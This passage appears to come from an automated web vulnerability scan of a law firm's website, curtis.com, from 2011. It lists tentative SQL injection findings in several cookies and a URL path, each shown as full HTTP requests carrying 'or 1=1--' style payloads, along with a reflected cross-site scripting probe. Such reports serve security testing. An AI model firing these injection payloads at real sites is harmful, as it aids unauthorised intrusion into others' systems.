GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)16707661'%20or%201%3d1--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Sun, 18-Apr-2010 17:06:14 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)16707661'%20or%201%3d2--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.20. http://www.curtis.com/emaildisclaimer.cfm [sifrFetch cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The sifrFetch cookie appears to be vulnerable to SQL injection attacks. The payloads 12161945'%20or%201%3d1--%20 and 12161945'%20or%201%3d2--%20 were each submitted in the sifrFetch cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true12161945'%20or%201%3d1--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:06:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SIFRFETCH=;expires=Sun, 18-Apr-2010 17:06:07 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true12161945'%20or%201%3d2--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.6.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:06:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Email Disclaimer</title>
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<style type="text/css">
<!--
body,td,th {
   font-family: Verdana, Arial, Helvetica, sans-serif;
   color: #000000;
   line-height: 1.4em;
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin: 20px;
}

-->
</style>
</head>

<body>
<table width="460" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td valign="top" style="padding: 20px; text-align:justify;">
<p>We value your interest in Curtis, Mallet-Prevost, Colt & Mosle LLP and any communications prompted by your viewing of our website. It is important to us that you understand that transmitting information to us by e-mail does not establish any attorney-client or confidential relationship with us. An attorney-client relationship, and an obligation for the Firm to maintain your communications in confidence, can be created only after proper checks for potential conflicts with current clients are conducted and an agreement of representation is reached. Any information provided to us without such a prior agreement may waive legal privileges that you might otherwise have. In addition, in the absence of such an agreement, the Firm will be entitled to utilize such information on behalf of existing or future clients who may be adverse to your interests. For that reason, please refrain from sending the Firm confidential information through e-mail. Thank you for your interest in Cu
...[SNIP]...

1.21. http://www.curtis.com/favicon.ico [CFID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 61658724%20or%201%3d1--%20 and 61658724%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=617584361658724%20or%201%3d1--%20; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Sun, 18-Apr-2010 17:00:51 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=617584361658724%20or%201%3d2--%20; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175919;path=/
Set-Cookie: CFTOKEN=56500703;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.22. http://www.curtis.com/favicon.ico [CFTOKEN cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 57319298%20or%201%3d1--%20 and 57319298%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=3257569757319298%20or%201%3d1--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Sun, 18-Apr-2010 17:01:01 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=3257569757319298%20or%201%3d2--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175943;path=/
Set-Cookie: CFTOKEN=60929706;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.23. http://www.curtis.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 67004861'%20or%201%3d1--%20 and 67004861'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico67004861'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /favicon.ico67004861'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=6175843; CFTOKEN=32575697; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.2.10.1303145803

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.24. http://www.curtis.com/favicon.ico [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 11177873'%20or%201%3d1--%20 and 11177873'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.111177873'%20or%201%3d1--%20; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Sun, 18-Apr-2010 17:01:02 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.111177873'%20or%201%3d2--%20; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.v
...[SNIP]...

1.25. http://www.curtis.com/favicon.ico [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /favicon.ico

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payloads 20486949'%20or%201%3d1--%20 and 20486949'%20or%201%3d2--%20 were each submitted in the __utmb cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.130314580320486949'%20or%201%3d1--%20; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMB=;expires=Sun, 18-Apr-2010 17:01:20 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /favicon.ico HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
